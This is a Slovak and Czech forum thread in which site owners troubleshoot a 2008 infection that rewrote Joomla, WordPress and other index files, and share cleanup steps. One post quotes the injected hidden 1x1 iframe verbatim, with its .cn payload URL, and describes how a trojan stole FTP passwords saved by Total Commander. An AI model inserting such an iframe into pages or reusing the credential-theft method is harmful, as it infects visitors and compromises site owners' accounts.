Takze moja domnienka po analyze problemu je nasledovna:
1. v ten isty den som robil update na dvoch strankach z 1.5.7 na 1.5.8, stranky doteraz bezia bezchybne, je tam nastavene 755 na adresare, uz asi tyzden su bez skodliveho kodu v index.php a nejako si ani nespominam ze by tam bol...
2. jednu stranku som updatol par dni po tychto dvoch, rovnakym sposobom, vsetko prebehlo rovnako, mam rovnake nastavenia, na tejto stranke som zistil skodlivy iframe v kazdom index.html co je na stranke - skontrolujte si to, v podstate cela stranka je nakazena, ak je moja tak budu aj tie vase, hladajte hlavne v index.html....
3. z toho mi vyplyva, ze ked bola vydana nova verzia joomly, niekto stranky updatnut stihol, niekto nie, medzitym tam uz vliezol malvare a ten robi sarapatu....na joomla.org to rozoberaju, ale nerozumiem celkom vsetkemu, ak sa v tom niekto vyzna a poradi budem velmi rad...tu je link
http://forum.joomla.org/viewtopic.php?f=432&t=345314&start=30

Taka otazka, mam urobenu zalohu, ktora nie je infikovana, skontroloval som ju, myslite ze pomoze ked poprosim aby mi hosting kompletne premazal moj webserver a takto to obnovim? zatial jedine co ma napadlo....hladam dalej...

No nedalo mi to, nezapojiť sa do tejto debaty 

Ja tento problém riešim už zhruba týždeň.
Spočiatku mi to premazávalo len občas, asi tak každý 2-3 deň. Neskôr už aj 2x denne. Vždy som to riešil nahratím stránky zo zálohy, ale aj tak ma to zasa napadlo a všetko prepísalo.
Neviem z toho presne z istotou povedať čo je problém v joomle alebo nie, ale jedno viem naisto a to, že to neničí len joomlu ale ako už emirich spomenul pokazí to aj wordpress, a v mojom prípade tiež phpBB3 a rovnako aj obyčajný ručne písaný index.php, ktorí je len titulka s odkazmi na subdomány.
Maže to niekedy podľa nálady, raz len hlavné časti ako index.php, ktoré sú aktívne napr. úvodný v joomle potom v amdinistrácií a tiež aj aktuálny index ku template. Ale niektoré zmení aj čo sú "pasívne".
Atribúty mám na všetko 604 okrem povinných vecí, ktoré musia byť na 777 a pod.

20.11.08 mi z hostingu na moje požiadanie zmazali celý obsah www_root a ja som tam hneď nato nahral zálohu a nechcem to zarieknuť, ale zatiaľ mi to ide bez napadnutia.

Aby som nezabudol, menil som prístupové hesla na ftp účtoch cez setup.sk a zjavne pomohlo aj to.

Ohľadne vírusov neviem ako to presne je ale je pravda, že som aj na HDD našiel 2 vírusy cez ESET a nejaké hlúposti aj cez Ad-Aware.

Možno sa mýlim ale momentálne to chápem asi tak, že zrejme na hostingu behá nejaký vírus, ktorí si zisťuje postupne heslá a mení si index.php. Nechce sa mi totiž veriť, že to robí nejaký človek ručne tým, že si dá zistiť heslá nejakým červom a potom to pekne prepisuje.
Tiež nechápem zámer toho somára čo to robí, buď nech nám na stránke zničí všetko alebo sa nato vykašle. Heslá nám asi zmeniť nemôže, lebo by potreboval ešte zistiť aj prístup na setup.sk.

preto skúste nasledovnú variantu:
1. preverte si Váš PC, na ktorom spravujete web na vírusy a pod svinstvo
2. na www.setup.sk si zmente všetky prístupy na FTP účty
3. zmažte veškerý obsah na FTP, alebo ako som to spravil ja požiadajte o kompletné zmazanie /www_root/ administrátora hostingu
4. z čistého PC a z novými heslami nahrajte zálohu, o ktorej si myslíte, že nie je napadnutá
5. neostáva nič iné len 1-3 dni počkať či sa to znova vráti 

heh no super, uz aj ja som to chytil. napadlo to 3weby , jeden joomla, jeden kodeny v html a jeden v php. pravdepodobne mi to odchytil nejaky trojan ktory som nasiel v pccku.  .
vzdy to napadlo index .

takze toto som nasiel na diskusnom fore phorum.ic.cz:

Virus, který se Vám dostal do PC naskenoval Vaše FTP přístupy, zřejmě používáte Total Commander (soubor c:/windows/wcx_ftp.ini). Pak dekompiloval hashované heslo (existuje spousta nástrojů) a přihlásil se na FTP, vyhledává soubory index, default, homepage a do kódu vkládá ( většinou hned za <body>) následující iframe: <iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

Dále napadá funkčnost antiviru a práva administrátora PC k instalaci jiného antiviru.
Řešení:
-Změna přístupových údajů k FTP
-Odstranění souborů wiaserva.log a AgCPanelKoreanf.exe z PC


Více naleznete na http://clonet.cz/phpBB3/viewtopic.php?f=70&t=91

neviem, ci hovorim na spravnu vec, ale mozno to pomoze, ze ja ked som vymazaval tieto iframey, tak mi to este do niektorych vlozilo take nieco, ze "echo;"
alebo teda neviem ci to tam malo byt a ked som to vymazal, tak mi isla stranka v poriadku, ako predtym

Jednoduche riešenie. Všetko zmazať a potom nanovo nahrať joomla a postupne doplniť dane veci.

Pred tým si to pre istotu zálohuj. FTP aj Databázu.

Neviem co presne všetko máš na stránke ale tak skus to napísať možno sa to bude dať jednoducho všetko ponadhadzovať.